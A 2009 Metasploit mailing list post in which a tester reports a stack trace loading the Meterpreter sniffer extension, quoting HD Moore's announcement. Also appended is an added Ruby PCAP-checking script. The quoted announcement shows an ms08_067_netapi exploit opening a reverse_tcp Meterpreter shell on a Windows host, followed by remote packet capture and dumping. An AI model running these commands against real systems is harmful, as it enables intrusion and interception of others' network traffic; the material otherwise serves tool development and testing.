Metasploit mailing list archives
Meterpreter Sniffer module
From: xyberpix at xyberpix.com (xyberpix)
Date: Sat, 11 Jul 2009 15:51:01 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey HD,

Just did a quick test, and it barfed on me, dunno though whether this is the code, or my setup. Running on OS X 10.5.7, with Mac Port installed.

meterpreter > use sniffer
Loading extension sniffer...[-] failure: No response was received to the core_loadlib request.
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/client_core.rb:157:in `use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:266:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter >

xyberpix

On 11 Jul 2009, at 15:38, HD Moore wrote:
I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well.

To obtain the latest version of Metasploit on UNIX platforms:

$ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:

1. Download https://metasploit.com/framework-3.3-dev.exe
2. Execute this and extract the framework to a directory
3. Inside the extracted directory execute msfupdate.bat
4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license); it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpreter communication is now protected by TLS/SSL, including the packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help
[snip]

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data
    sniffer_interfaces  List all remote sniffable interfaces
    sniffer_start       Capture packets on a previously opened interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new one.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkpYptUACgkQ0IPlrIA4qxpfUwCaAiLcu+nmcRSH3CT1wkHtdxE3
YzoAn3WFO5UJTcrejiIsoPswYTadzigN
=beiw
-----END PGP SIGNATURE-----
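An added example, not part of this thread and not Metasploit code: a small Ruby checker for the file that sniffer_dump writes, covering the two claims in HD's message that a tester would want to verify, that repeated dumps append to one PCAP and that the module's own control traffic is excluded from the capture. It assumes the file is classic libpcap with an Ethernet link type, and takes the handler address 192.168.0.139:4444 from the session line in the message. It parses the file, counts records, rejects a file that carries a second global header mid-stream (what a dump that rewrote the header instead of appending would produce), and lists any packets touching the Meterpreter handler, which should be none if the exclusion holds. The capture bytes are constructed inline for the example; parse_pcap, endpoints, control_traffic, audit and rejects_second_header? are names chosen here.

```ruby
require 'stringio'
require 'ipaddr'

PCAP_MAGICS = [0xa1b2c3d4, 0xd4c3b2a1].freeze

# Parse a classic libpcap file. Returns [linktype, records]; each record is
# { ts: Float, data: String }. A second global header mid-stream (a dump that
# rewrote the header instead of appending records) raises ArgumentError.
def parse_pcap(bytes)
  raise ArgumentError, 'too short for a pcap header' if bytes.bytesize < 24
  io = StringIO.new(bytes)
  e = case io.read(4).unpack1('L<')
      when 0xa1b2c3d4 then '<'   # little-endian writer
      when 0xd4c3b2a1 then '>'   # big-endian writer
      else raise ArgumentError, 'bad pcap magic'
      end
  _maj, _min, _tz, _sig, _snap, linktype = io.read(20).unpack("S#{e}S#{e}l#{e}L#{e}L#{e}L#{e}")
  records = []
  until io.eof?
    hdr = io.read(16)
    raise ArgumentError, 'truncated record header' if hdr.bytesize < 16
    ts_sec, ts_usec, incl_len, orig_len = hdr.unpack("L#{e}L#{e}L#{e}L#{e}")
    if PCAP_MAGICS.include?(ts_sec)
      raise ArgumentError, "second global header at offset #{io.pos - 16}: not an append"
    end
    raise ArgumentError, 'incl_len exceeds orig_len' if incl_len > orig_len
    data = io.read(incl_len) || ''
    raise ArgumentError, 'truncated packet data' if data.bytesize < incl_len
    records << { ts: ts_sec + ts_usec / 1_000_000.0, data: data }
  end
  [linktype, records]
end

# Decode Ethernet/IPv4 and the TCP/UDP port pair; nil for anything else.
def endpoints(frame)
  return nil if frame.bytesize < 34 || frame[12, 2].unpack1('n') != 0x0800
  ihl   = (frame.getbyte(14) & 0x0f) * 4
  proto = frame.getbyte(23)
  src   = frame[26, 4].unpack('C4').join('.')
  dst   = frame[30, 4].unpack('C4').join('.')
  l4    = 14 + ihl
  return { src: src, dst: dst, proto: proto } unless [6, 17].include?(proto) && frame.bytesize >= l4 + 4
  sport, dport = frame[l4, 4].unpack('nn')
  { src: src, sport: sport, dst: dst, dport: dport, proto: proto }
end

# Packets that touch the Meterpreter handler (LHOST:LPORT). A capture in which
# the module's control-traffic exclusion worked returns an empty array.
def control_traffic(records, lhost, lport)
  records.map { |r| endpoints(r[:data]) }.compact.select do |p|
    (p[:src] == lhost && p[:sport] == lport) || (p[:dst] == lhost && p[:dport] == lport)
  end
end

def audit(bytes, lhost, lport)
  _linktype, records = parse_pcap(bytes)
  { packets: records.size, control: control_traffic(records, lhost, lport).size }
end

# true when the parser refuses the file because a second global header appears mid-stream
def rejects_second_header?(bytes)
  parse_pcap(bytes)
  false
rescue ArgumentError => err
  err.message.include?('second global header')
end

# --- constructed sample data (not a real capture) ------------------------------

# Minimal Ethernet/IPv4/TCP frame; checksums left zero, which is fine for parsing.
def tcp_frame(src, sport, dst, dport, payload = '')
  ip_len = 20 + 20 + payload.bytesize
  eth = "\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb".b + [0x0800].pack('n')
  ip  = [0x45, 0, ip_len, 0, 0, 64, 6, 0].pack('CCnnnCCn') + IPAddr.new(src).hton + IPAddr.new(dst).hton
  tcp = [sport, dport, 0, 0, 0x5018, 8192, 0, 0].pack('nnNNnnnn')
  eth + ip + tcp + payload.b
end

def pcap_global_header
  [0xa1b2c3d4, 2, 4, 0, 0, 65_535, 1].pack('L<S<S<l<L<L<L<')   # linktype 1 = Ethernet
end

def pcap_record(frame, ts_sec)
  [ts_sec, 0, frame.bytesize, frame.bytesize].pack('L<L<L<L<') + frame
end

# Two dumps appended correctly: one header, then records. The first packet is
# handler traffic (192.168.0.120:1687 -> 192.168.0.139:4444) so the check has
# something to flag; the second is ordinary HTTP.
SAMPLE_PCAP = pcap_global_header +
  pcap_record(tcp_frame('192.168.0.120', 1687, '192.168.0.139', 4444, 'ctl'), 1_247_324_000) +
  pcap_record(tcp_frame('192.168.0.120', 1025, '192.168.0.1', 80, 'GET / HTTP/1.0'), 1_247_324_001)

# A broken "append": a second global header written in the middle of the file.
BAD_APPEND_PCAP = SAMPLE_PCAP + pcap_global_header +
  pcap_record(tcp_frame('192.168.0.120', 1026, '192.168.0.1', 80), 1_247_324_002)

if $PROGRAM_NAME == __FILE__
  p audit(SAMPLE_PCAP, '192.168.0.139', 4444)
  p rejects_second_header?(BAD_APPEND_PCAP)
end
```

Against a real capture, call audit(File.binread('/tmp/all.cap'), LHOST, LPORT) with the handler address of your session: a non-zero control count means packets on the Meterpreter channel leaked into the capture for that interface, and a "second global header" error means the two sniffer_dump runs were written as independent files rather than appended.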
Current thread:
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 12)
- Meterpreter Sniffer module jep (Jul 13)
- Meterpreter Sniffer module HD Moore (Jul 13)